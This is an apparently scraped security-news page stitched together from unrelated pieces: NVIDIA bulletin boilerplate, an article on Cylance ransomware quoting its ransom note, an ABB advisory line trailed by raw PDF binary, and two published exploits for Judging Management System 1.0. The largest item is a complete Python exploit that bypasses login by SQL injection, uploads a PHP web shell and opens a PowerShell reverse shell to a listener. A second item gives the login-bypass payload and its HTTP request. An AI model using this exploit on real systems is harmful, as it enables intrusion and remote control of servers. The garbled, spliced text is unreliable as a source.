CVE-2023-0194, CVE-2023-0195: Imre Kis

**Get the Most Up to Date Product Security Information**

Visit the NVIDIA Product Security page to

*   Subscribe to security bulletin notifications
*   See the current list of NVIDIA security bulletins
*   Report a potential security issue in any NVIDIA supported product
*   Learn more about the vulnerability management process followed by the NVIDIA Product Security Incident Response Team (PSIRT)

**Revision History**

  

**Revision**

**Date**

**Description**

1.0

March 30, 2023

Initial release

**Support**

If you have any questions about this security bulletin, contact NVIDIA Support.

**Frequently Asked Questions (FAQs)**

How do I determine which NVIDIA display driver version is currently installed on my PC?

**Disclaimer**

ALL NVIDIA INFORMATION, DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OR CONDITION OF TITLE, MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, ARE HEREBY EXCLUDED TO THE MAXIMUM EXTENT PERMITTED BY LAW.

Information is believed to be accurate and reliable at the time it is furnished. However, NVIDIA Corporation assumes no responsibility for the consequences of use of such information or for any infringement of patents or other rights of third parties that may result from its use. No license is granted by implication or otherwise under any patent or patent rights of NVIDIA Corporation. Specifications mentioned in this publication are subject to change without notice. This publication supersedes and replaces all information previously supplied. NVIDIA Corporation products are not authorized for use as critical components in life support devices or systems without express written approval of NVIDIA Corporation.

CVE-2023-0198: NVIDIA Support

By Waqas
For now, Cylance ransomware is still in its early stages, yet it has already claimed several victims.
This is a post from HackRead.com Read the original post: New Cylance Ransomware Targets Linux and Windows, Warn Researchers

Do not confuse Cylance Ransomware with the Blackberry-owned Cylance cybersecurity company.

The cybersecurity researchers at Palo Alto Networks Unit 42 have discovered a new strain of Cylance Ransomware, which has already claimed several victims. Researchers noticed it early Friday morning, and further probing revealed that it is targeting Linux and Windows devices.

As of now, insufficient information is available about Cylance Ransomware, indicating that it is a relatively recent emergence. The ransom note received by victims was published by Unit 42 which contains the attackers’ email addresses, but surprisingly not the ransom amount. Here is the content of the ransom note:

“All your files are encrypted, and currently unusable, but you need to follow our instructions. Otherwise, you can’t return your data (never. It’s just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities – nobody will cooperate with us. It’s not in our interests.”

“To check the ability of returning files, we decrypt one file for free. That is our guarantee. If you will not cooperate with our service – for us, it does not matter. But you will lose time and data, cause just we have the private key. time is more valuable than money.”

It is believed that the amount will be disclosed to the victim when they contact the attacker. The attackers have warned against any attempt to restore or change the files, as it would destroy the private key, which means the data will be lost forever.

**Attack Methodology**

In a tweet, researchers explained that the modus operandi of the ransomware attack involves encrypting files and appending them with a “.Cylance” extension. In addition, a text file titled “Read Me” is added to all encrypted files’ folders. This file contains the attacker’s ransom note.

**Who is Distributing Cylance Ransomware?**

For your information, Cylance is actually a cybersecurity company owned by BlackBerry Ltd. The company is known for mitigating and preventing ransomware attacks on enterprise organizations. However, why threat actors named the ransomware after this company is unclear, or it could be that they are looking for extra attention or to negatively impact Cylance in the long run.

Although Cylance ransomware is still in its early stages, it will be crucial to monitor its targets and wait for more information from the infosec community. Currently, samples of the ransomware are available on MalwareBazaar, a project by abuse.ch that shares malware samples with the infosec community, AV vendors, and threat intelligence providers.

1.  95.6% of Malware in 2022 Targeted Windows
2.  Lessons from Holy Ghost ransomware attacks
3.  CryWiper poses as ransomware to target Russia
4.  Royal Ransomware: New Threat Uses Google Ads
5.  Alert against AXLocker, Octocrypt, Alice ransomware

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

New Cylance Ransomware Targets Linux and Windows, Warn Researchers

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between March 24 and March 31. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for March 24 to March 31

Improper Input Validation vulnerability in ABB AC500 V2 PM5xx allows Client-Server Protocol Manipulation.This issue affects AC500 V2: from 2.0.0 before 2.8.6.

%PDF-1.4 %���� 1 0 obj << /Author (Ben Schroeter) /CreationDate (D:20230330131957+03'00') /Creator (PDF-XChange Office Addin) /CreatorTool (PDF-XChange Standard \$9.4 build 363\$ \[GDI\] \[Windows 10 Enterprise x64 \$Build 19044\$\]) /ModDate (D:20230330132003+03'00') /Producer (PDF-XChange Standard \$9.4 build 363\$ \[GDI\] \[Windows 10 Enterprise x64 \$Build 19044\$\]) /Subject (AC500 V2) /Title (Cyber Security Advisory) >> endobj 2 0 obj << /Metadata 3 0 R /Outlines 4 0 R /Pages 5 0 R /Type /Catalog >> endobj 3 0 obj << /Length 3495 /Subtype /XML /Type /Metadata >> stream application/pdf Cyber Security Advisory AC500 V2 Ben Schroeter uuid:a57b4ba8-a272-4bde-add4-d27b2fe96f47 uuid:5b146c0d-1d52-43f0-9222-20a70987ad69 PDF-XChange Office Addin 2023-03-30T13:19:57+03:00 2023-03-30T13:20:03+03:00 PDF-XChange Standard (9.4 build 363) \[GDI\] \[Windows 10 Enterprise x64 (Build 19044)\] PDF-XChange Standard (9.4 build 363) \[GDI\] \[Windows 10 Enterprise x64 (Build 19044)\] endstream endobj 4 0 obj << /Count 28 /First 6 0 R /Last 7 0 R >> endobj 5 0 obj << /Count 7 /Kids \[8 0 R 9 0 R 10 0 R 11 0 R 12 0 R 13 0 R 14 0 R\] /Type /Pages >> endobj 6 0 obj << /A << /D \[9 0 R /XYZ 64 749.5 0\] /S /GoTo >> /C \[0 0 0\] /Next 15 0 R /Parent 4 0 R /Title (Purpose) >> endobj 7 0 obj << /A << /D \[14 0 R /XYZ 64 315.5 0\] /S /GoTo >> /C \[0 0 0\] /Parent 4 0 R /Prev 16 0 R /Title (Revision history) >> endobj 8 0 obj << /Contents 17 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 9 0 obj << /Contents 21 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 10 0 obj << /Annots \[23 0 R 24 0 R 25 0 R 26 0 R 27 0 R 28 0 R\] /Contents 29 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 11 0 obj << /Contents 30 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 12 0 obj << /Annots \[31 0 R\] /Contents 32 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 13 0 obj << /Contents 33 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 14 0 obj << /Annots \[34 0 R 35 0 R 36 0 R 37 0 R 38 0 R 39 0 R 40 0 R 41 0 R 42 0 R\] /Contents 43 0 R /MediaBox \[0 0 595.2 841.92\] /Parent 5 0 R /Resources <> >> /Type /Page >> endobj 15 0 obj << /A << /D \[9 0 R /XYZ 64 445 0\] /S /GoTo >> /C \[0 0 0\] /Next 44 0 R /Parent 4 0 R /Prev 6 0 R /Title (Affected products) >> endobj 16 0 obj << /A << /D \[14 0 R /XYZ 64 424.5 0\] /S /GoTo >> /C \[0 0 0\] /Next 7 0 R /Parent 4 0 R /Prev 45 0 R /Title (Support) >> endobj 17 0 obj << /Filter /FlateDecode /Length 3036 >> stream xڍYK��F��WԱ{1d��Wn������E��#Q#&��%)�N~��Mr;Hv��z~U�t,�L^����;��y\]��u�yg�)a{Jp�R�G���zI���ͳ���7����i�,��V�U���" �6s�\*�V�,�7P����,����ϊj�����v���yFZ�Α�KY�1�9��3:�!��u���Yf&ÜϺ��D��:&��uN+v�'X�E� "?M���:�=S1B�)~����u�y9Y;H)�Gp�BPQ���)8Jv� MI� (ȽdFND !r�fA�ZP�����Oy2f�5�+S�����M��rjٷ%� �%P�3<�F�Z|�8۔ ,!9�r�rO�UҘp���A-,q�0���i���H9�-11��h+a��jށ�dm���"��2�� �����|�䋒�( �@f�hg�W�A.U�\[@$d�W+JE�\*�$�\[A!�\\S��(�,��:\\:Ia�Q�A�ܯ%��պZ�Ha'3�ż�\`4a^��+i-�9҂����hռ�4����H?\\P!)��FJi��.�a� ��;G�q��� V¿ �| v��R� �\[ �4o��2�803�+��z-A��{L�^��ū8�<��\[���c�\_e\\�kK�:>�^σ�S\]�r^��r�1���a�/x��^���i�+��\\OK\_�i�0�5�+���q\\\[�a�I��

CVE-2022-3192

Judging Management System version 1.0 suffers from bypass and remote shell upload vulnerabilities.

# Exploit Title: Judging Management System v1.0 - Remote Code Execution (RCE)# Date: 12/11/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 on XAAMP serverimport requests,argparse,re,time,base64import urllib.parsefrom colorama import (Fore as F,Back as B,Style as S)from bs4 import BeautifulSoupBANNER = """╔═══════════════════════════════════════════════════════════════════════════════════════════════════════╗║ Judging Management System v1.0 - Auth Bypass + Unrestricted File Upload = Remote Code Execution (RCE) ║╚═══════════════════════════════════════════════════════════════════════════════════════════════════════╝"""def argsetup(): desc = S.BRIGHT + 'Judging Management System v1.0 - Remote Code Execution (RCE)' parser = argparse.ArgumentParser(description=desc) parser.add_argument('-t', '--target', help='Target URL, Ex: http://localhost/php-jms', required=True) parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True) parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True) args = parser.parse_args() return args# Performs Auth bypass in order to get the admin cookiedef auth_bypass(args): print(F.CYAN+"[+] Login into the application through Auth Bypass vulnerability...") session = requests.Session() loginUrl = f"{args.target}/login.php" username = """' OR 1=1-- -""" password = "randomvalue1234" data = {'username': username, 'password': password} login = session.post(loginUrl,verify=False,data=data) admin_cookie = login.cookies['PHPSESSID'] print(F.GREEN+"[+] Admin cookies obtained !!!") return admin_cookie# Checks if the file has been uploaded to /uploads directorydef check_file(args,cookie): uploads_endpoint = f"{args.target}/uploads/" cookies = {'PHPSESSID': f'{cookie}'} req = requests.get(uploads_endpoint,verify=False,cookies=cookies) soup = BeautifulSoup(req.text,features='html.parser') files = soup.find_all("a") for i in range (len(files)): match = re.search(".*-shelljudgesystem\.php",files[i].get('href')) if match: file = files[i].get('href') print(F.CYAN+"[+] The webshell is at the following Url: "+f"{args.target}/uploads/"+file) return file return Nonedef file_upload(args,cookie): now = int(time.time()) endpoint = f"{args.target}/edit_organizer.php" cookies = {'wp-settings-time-1':f"{now}",'PHPSESSID': f'{cookie}'} get_req = requests.get(endpoint,verify=False,cookies=cookies) soup = BeautifulSoup(get_req.text,features='html.parser') username = soup.find("input",{"name":"username"}).get('value') admin_password = soup.find("input",{"id":"password"}).get('value') print(F.GREEN + "[+] Admin username: " + username) print(F.GREEN + "[+] Admin password: " + admin_password) # Multi-part request file_dict = { 'fname':(None,"Random"), 'mname':(None,"Random"), 'lname':(None,"Random"), 'email':(None,"ranom@mail.com"), 'pnum':(None,"014564343"), 'cname':(None,"Random"), 'caddress':(None,"Random"), 'ctelephone':(None,"928928392"), 'cemail':(None,"company@mail.com"), 'cwebsite':(None,"http://company.com"), 'file':("shelljudgesystem.php","<?php system($_REQUEST['cmd']) ?>","application/octet-stream"), 'username':(None,f"{admin_password}"), 'passwordx':(None,f"{admin_password}"), 'password2x':(None,f"{admin_password}"), 'password':(None,f"{admin_password}"), 'update':(None,"") } req = requests.post(endpoint,verify=False,cookies=cookies,files=file_dict)def exploit(args,cookie,file): payload = f"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient('{args.listenip}',{args.listenport})%3b"""+"""$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" """ uploads_endpoint = f"{args.target}/uploads/{file}?cmd={payload}" cookies = {'PHPSESSID': f'{cookie}'} print(F.GREEN + "\n[+] Enjoy your reverse shell ") requests.get(uploads_endpoint,verify=False,cookies=cookies) if __name__ == '__main__': print(F.CYAN + BANNER) args = argsetup() cookie=auth_bypass(args=args) file_upload(args=args,cookie=cookie) file_name=check_file(args=args,cookie=cookie) if file_name is not None: exploit(args=args,cookie=cookie,file=file_name) else: print(F.RED + "[!] File not found")

Judging Management System 1.0 Shell Upload

Judging Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for login bypass.

    # Exploit Title: Judging Management System v1.0 - Authentication Bypass# Date: 12/11/2022# Exploit Author: Angelo Pio Amirante# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html# Version: 1.0# Tested on: Windows 10 on XAAMP server# Vulnerability: An attacker can bypass login page and access to dashboard page# Vulnerable file: login.php# Exploit:1) Go to: http://localhost/php-jms/index.php2) As username use this payload: 'or 1=1-- -3) Use random words for passwordPOST /php-jms/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 37Origin: http://localhostConnection: closeReferer: http://localhost/php-jms/index.phpCookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782.Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1username=%27or+1%3D1--+-&password=asa

Tag

#windows